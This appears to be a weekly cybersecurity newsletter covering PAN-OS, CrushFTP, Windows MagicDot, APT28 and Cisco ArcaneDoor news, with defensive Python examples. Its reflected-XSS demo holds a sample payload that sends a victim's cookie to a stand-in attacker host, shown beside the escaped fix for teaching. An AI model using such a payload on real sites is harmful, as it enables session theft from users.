Good Morning and Happy Friday - Your weekly sip of the latest in cybersecurity from the Cybersec Cafe: Palo Alto continues to be threatened. Cyberattacks are expensive and on the rise. Is Android really safe?
Palo Alto Networks PAN-OS Vulnerability Threatens Global Networks
Since last week, a critical security flaw, CVE-2024-3400, affecting PAN-OS versions 10.2, 11.0, and 11.1, has been actively exploited by threat actors, prompting Palo Alto Networks to issue urgent patches. The vulnerability, a combination of two bugs, allows unauthenticated remote command execution on the firewall, posing significant risk to organizations. Dubbed "Operation MidnightEclipse," the exploitation involves a two-stage attack leveraging specially crafted requests and a backdoor named UPSTYLE. Exploitation was initially believed to require both a GlobalProtect gateway or portal and device telemetry to be enabled, but later findings showed the telemetry requirement can be bypassed, widening the set of vulnerable devices. Palo Alto Networks has extended patches to various maintenance releases and urges immediate hotfix application to mitigate the threat. With proof-of-concept exploit code publicly available and a federal directive from CISA, swift action is imperative to secure vulnerable devices.
Did You Know?
Password Hygiene is Just as Important as Physical Hygiene…
Except it’s generally forgotten (unlike your physical hygiene, right?). Best practice is to use a unique password for every account. We all know this, but does anyone actually do it? Here are some password tips:
Use a passphrase, not a password (12-16 characters or more)
Don’t use any personal information
Store passwords in a password manager
Hiding in Plain Sight
Malware authors employ ingenious methods to conceal their activities. This could involve renaming legitimate files and embedding a malicious payload within a file that appears to be an error log. They use a range of tactics to obfuscate the attack, such as disguising the payload behind an existing scheduled task and altering the names of both legitimate files and the payload stored within them. Think twice the next time you download that file from an email address you don’t recognize.
Apple > Android?
Whether you’re team Apple or team Android, it’s clear that Android platforms are viewed as the more vulnerable target in the realm of cybersecurity. For example, downloading applications from untrustworthy sources can leave smartphones susceptible to malware and cybercrime, and Android app stores do not vet applications as rigorously. Moreover, lax app permissions can give attackers opportunities to steal sensitive data and exploit mobile payment flows. Be wary of downloading applications that aren’t highly rated or aren’t from known companies.
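The "Hiding in Plain Sight" item above describes a payload dressed up as an error log. One practical check for that trick is to compare what a file's extension claims against the magic bytes at the start of its content. The script below is an added example written for this newsletter, not code from any of the campaigns described; the directory contents it scans are constructed in a temporary folder so it runs offline.

```python
"""Flag files whose extension claims plain text but whose content starts with
an executable/container signature (e.g. a ".log" that is really a PE file).

Added example; the sample directory is constructed inline.
"""
import os
import tempfile

# Well-known file signatures (magic bytes) for executables and containers.
EXECUTABLE_SIGNATURES = {
    b"MZ": "Windows PE executable",
    b"\x7fELF": "ELF executable",
    b"\xcf\xfa\xed\xfe": "Mach-O 64-bit executable",
    b"PK\x03\x04": "ZIP container (could be a JAR/APK/Office document)",
}

# Extensions that should only ever hold plain text.
TEXT_EXTENSIONS = {".log", ".txt", ".csv", ".ini", ".cfg"}


def detect_signature(header: bytes):
    """Return a description if the header matches a known binary signature, else None."""
    for magic, description in EXECUTABLE_SIGNATURES.items():
        if header.startswith(magic):
            return description
    return None


def is_masquerading(path: str) -> bool:
    """True if a text-named file carries an executable/container signature."""
    ext = os.path.splitext(path)[1].lower()
    if ext not in TEXT_EXTENSIONS:
        return False
    with open(path, "rb") as f:
        header = f.read(8)
    return detect_signature(header) is not None


def scan_directory(directory: str):
    """Return the names of masquerading files directly under `directory`."""
    findings = []
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if os.path.isfile(path) and is_masquerading(path):
            findings.append(name)
    return findings


def build_sample_directory() -> str:
    """Constructed sample: a real log, a PE payload named like a log, a real exe."""
    d = tempfile.mkdtemp(prefix="masq_")
    with open(os.path.join(d, "app_error.log"), "wb") as f:
        f.write(b"2024-04-26 10:00:01 ERROR connection refused\n")
    with open(os.path.join(d, "system_error.log"), "wb") as f:
        # MZ header followed by the familiar DOS stub text: an executable in disguise.
        f.write(b"MZ\x90\x00" + b"\x00" * 60 + b"This program cannot be run in DOS mode")
    with open(os.path.join(d, "updater.exe"), "wb") as f:
        f.write(b"MZ\x90\x00" + b"\x00" * 60)
    return d


def run_demo():
    """Build the sample directory and return what the scan flags."""
    return scan_directory(build_sample_directory())


if __name__ == "__main__":
    print(run_demo())  # ['system_error.log']
```

This is a heuristic, not a verdict: a script payload (.bat, .ps1, .vbs) hidden in a ".log" has no binary signature and would pass this check, and an attacker can prepend junk before the real header. Treat a hit as a reason to look at the file and at whatever scheduled task or process references it.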
Update Your CrushFTP Software Now
A serious security flaw in CrushFTP enterprise file transfer software, discovered by Simon Garrelou of Airbus CERT, has prompted urgent calls for users to update to the latest version, v11.1.0. The vulnerability, present in CrushFTP v11 versions below 11.1, allows users to escape their Virtual File System (VFS) and download system files, potentially leading to unauthorized access and data breaches. Although instances operating within DMZ environments are protected, CrowdStrike reports targeted exploitation of the flaw, particularly affecting U.S. entities. CrushFTP founder Ben Spink assures swift action in patching the vulnerability and urges customers to prioritize updating to safeguard against potential attacks.
This week at the Cybersec Cafe…
Reflected Cross-Site Scripting (XSS): WWWWWH?
Tired of learning theory behind Cross-Site Scripting and want to understand how to weaponize it in the real world?
This week’s article explains exactly the Who, What, When, Where, Why, and How of Reflected Cross-Site Scripting.
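To put the "How" in concrete terms, here is an added example (not taken from the article itself) of the core reflected XSS bug and its fix: a search page that copies the user-supplied q parameter straight into its HTML, beside the same page with the parameter escaped for an HTML text context. The URL, the hostnames and the page template are constructed for illustration.

```python
"""Reflected XSS: a parameter echoed verbatim into HTML, beside the escaped version.

Added example; shop.example / evil.example and the page template are made up.
"""
import html
from urllib.parse import parse_qs, urlparse

PAGE = "<html><body><h1>Results for: {q}</h1></body></html>"

# Constructed attack URL: the payload rides in the query string and is reflected once.
ATTACK_URL = (
    "https://shop.example/search?q="
    "<script>document.location='https://evil.example/?c='%2Bdocument.cookie</script>"
)


def query_from_url(url: str) -> str:
    """Pull the q parameter out of a URL, as a handler would read request.args['q']."""
    return parse_qs(urlparse(url).query).get("q", [""])[0]


def render_vulnerable(q: str) -> str:
    """Reflects the parameter verbatim: attacker-controlled HTML becomes part of the page."""
    return PAGE.format(q=q)


def render_hardened(q: str) -> str:
    """Escapes <, >, &, quotes before reflecting, so the payload is shown as text."""
    return PAGE.format(q=html.escape(q, quote=True))


def contains_script(rendered: str) -> bool:
    """Crude check used only to show whether a live <script> tag survived into the markup."""
    return "<script>" in rendered.lower()


def demo():
    """Return (vulnerable, hardened) renderings of the constructed attack URL."""
    q = query_from_url(ATTACK_URL)
    return render_vulnerable(q), render_hardened(q)


if __name__ == "__main__":
    vulnerable, hardened = demo()
    print("vulnerable executes script:", contains_script(vulnerable))  # True
    print("hardened executes script:  ", contains_script(hardened))    # False
```

html.escape is the right tool only for the HTML text and quoted-attribute contexts shown here; a value reflected inside a JavaScript block, a URL attribute or a CSS property needs the encoding for that context, and a Content-Security-Policy without unsafe-inline is the backstop when encoding is missed.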
Windows Path Conversion Vulnerability Enables Rootkit-Like Capabilities
Recent research has unveiled a critical security flaw in Windows' DOS-to-NT path conversion process, giving threat actors rootkit-like abilities to hide and impersonate files, directories, and processes. Discovered by SafeBreach security researcher Or Yair and presented at the Black Hat Asia conference, the issue stems from the conversion process stripping trailing dots and spaces from path components, which lets unprivileged users create "MagicDot paths" (names that normal Win32 APIs cannot address) for malicious purposes without administrative privileges. These capabilities include concealing files and processes, influencing prefetch file analysis, and deceiving tools like Task Manager and Process Explorer. Digging into the root cause also surfaced several distinct security vulnerabilities, including elevation of privilege (EoP) and remote code execution (RCE) flaws, highlighting the risk posed by a seemingly innocuous behaviour. Microsoft has patched some of those vulnerabilities, but the underlying path-conversion behaviour has not been changed, and the same class of issue could affect other software that performs its own path handling.
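The mechanism is easier to see with a small simulation. The following added example (written for this issue, not SafeBreach's tooling) mimics the component-wise stripping of trailing dots and spaces that the DOS-to-NT conversion performs, shows how "report.exe." collides with "report.exe" under the normalized view, and runs two checks a defender would want over a directory listing: names that end in a dot or space (only creatable through \\?\ paths) and groups of names that become identical after normalization. The listing is constructed, and the normalization is a simplified model, not a reimplementation of the Windows routine.

```python
"""Simulating the DOS-to-NT trailing-dot/space stripping that MagicDot abuses.

Added example; the directory listing is constructed and the normalization is a
simplified model of the Windows behaviour, not the real RtlDosPathNameToNtPathName.
"""
from collections import defaultdict


def normalize_component(name: str) -> str:
    """Mimic the stripping of trailing dots/spaces; '.' and '..' are left alone."""
    if name in (".", ".."):
        return name
    return name.rstrip(". ")


def dos_to_nt_view(path: str) -> str:
    """Normalize every component of a backslash-separated DOS path."""
    return "\\".join(normalize_component(p) for p in path.split("\\"))


def find_magicdot_names(listing):
    """Names ending in a dot or space: reachable only via a \\\\?\\ (verbatim) path."""
    return [n for n in listing if n not in (".", "..") and n != normalize_component(n)]


def find_collisions(listing):
    """Group raw names whose normalized (DOS-visible) form is identical."""
    groups = defaultdict(list)
    for name in listing:
        groups[normalize_component(name)].append(name)
    return {k: v for k, v in groups.items() if len(v) > 1}


# Constructed listing as an NT-level enumeration would return it
# (Explorer and most Win32 tools would show both report.exe entries as one name).
SAMPLE_LISTING = [
    "report.exe",
    "report.exe.",   # MagicDot twin: normal tooling resolves this to report.exe
    "notes.txt ",    # trailing space, same trick
    "..",
    "svchost.exe",
]


if __name__ == "__main__":
    print(dos_to_nt_view("C:\\temp\\report.exe."))   # C:\temp\report.exe
    print(find_magicdot_names(SAMPLE_LISTING))       # ['report.exe.', 'notes.txt ']
    print(find_collisions(SAMPLE_LISTING))           # {'report.exe': ['report.exe', 'report.exe.']}
```

On a live system the listing has to come from an enumeration that bypasses the DOS conversion (a \\?\-prefixed path or the native directory query), because a plain os.listdir or dir will already have had the trailing characters stripped by the time you see the names; that asymmetry is exactly what makes the trick useful to an attacker and what your detection has to work around.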
Worth the Read
American Football fan? Well, you might remember a few years back when the Jaguars jumbotron kept glitching out multiple weeks in a row. Turns out it was more than just a glitch: an attacker was abusing remote access through the TeamViewer software. But the team was able to outsmart him; here’s how they caught him and the spiral that ensued, resulting in a 220-year sentence.
Worried about Bitcoin scams? Here’s a great article going into depth about one that claims to have over $4 million in Bitcoin. They walk you through the steps they went through to check the legitimacy of this sophisticated scam, and the red flags they found along the way.
APT28 Exploits Windows Print Spooler Flaw with GooseEgg Malware
APT28, also known as Fancy Bear or Forest Blizzard, has recently exploited a security vulnerability (CVE-2022-38028) in the Microsoft Windows Print Spooler component to deploy a custom malware named GooseEgg, allowing for privilege escalation. This attack targeted government, non-governmental, education, and transportation organizations in Ukraine, Western Europe, and North America. GooseEgg, described as a simple launcher application, enables APT28 to execute commands with elevated permissions for activities like remote code execution, backdoor installation, and lateral movement within compromised networks. Associated with the Russian military intelligence agency GRU, APT28 has been active for nearly 15 years, focusing on intelligence collection aligned with Russian foreign policy goals. Concurrently, IBM X-Force has detected new phishing campaigns by the Gamaredon actor targeting Ukraine and Poland, deploying various iterations of the GammaLoad malware, indicating an escalation in actor resources and operational tempo orchestrated by Hive0051.
Your Thoughts?
What is the True Cost of Cyberattacks?
As we rapidly approach 2025, the global cost of cybercrime will have increased 3.5x over the past decade, up from $3 trillion to an estimated $10.5 trillion next year. While many tend to focus on how the cyberattack happened and the revenue loss that followed, I want to explore the other costs that come with a cyberattack.
Tainted Reputation: The disruption can strain relationships with customers, partners, and suppliers. Trust is a difficult thing for a company to win back once shattered, and many companies are one breach away from a potentially complete downfall.
Fines: Data breaches can violate privacy regulations, thus resulting in massive fines. Depending on the breach and scope, the amounts will vary. But one thing is certain: a rise in insurance premiums moving forward.
Tools: What tools in place need to be updated, replaced, or purchased to fill a gap? This will take time to identify gaps and determine the best way to fill them.
Manpower: Does a data breach mean you need to hire a full-time security team? Does more in-depth training need to occur to prevent future attacks? This increase in time spent preventing the next breach will decrease the time spent on other, potentially revenue-driving projects.
The cost of cyberattacks will undoubtedly keep increasing. Hopefully, the talent to prevent them will continue to expand with it. What do you think? Is there anything I missed?
State-Sponsored Actors Exploit Cisco Zero-Days for Covert Malware Deployment
A previously unidentified state-sponsored actor, UAT4356 (also known as Storm-1849 by Microsoft), orchestrated a sophisticated campaign named ArcaneDoor, exploiting two zero-day vulnerabilities in Cisco networking equipment to deploy custom malware, including backdoors named "Line Runner" and "Line Dancer." These implants facilitated a range of malicious activities, such as configuration modifications, reconnaissance, network traffic capture/exfiltration, and potential lateral movement within targeted environments. The vulnerabilities exploited, CVE-2024-20353 and CVE-2024-20359, impact Cisco Adaptive Security Appliance and Firepower Threat Defense Software, with one enabling denial-of-service attacks and the other allowing local code execution with root privileges. Despite the exact initial access pathway remaining unclear, UAT4356 began preparations as early as July 2023, demonstrating meticulous efforts to conceal its activities and evade detection. This incident underscores the growing targeting of edge devices by threat actors and emphasizes the need for timely patching, hardware/software updates, and enhanced security monitoring of network infrastructure.
Securely Yours,
The Cybersec Cafe
Just a heads up, The Cybersec Cafe's got a pretty cool weekly cadence.
Every week, expect to dive into the hacker’s mindset in our Methodology Walkthroughs or explore Deep Dive articles on various cybersecurity topics.
. . .
Oh, and if you want even more content and updates, hop over to Ryan G. Cox on Twitter/X or my Website. Can't wait to keep sharing and learning together!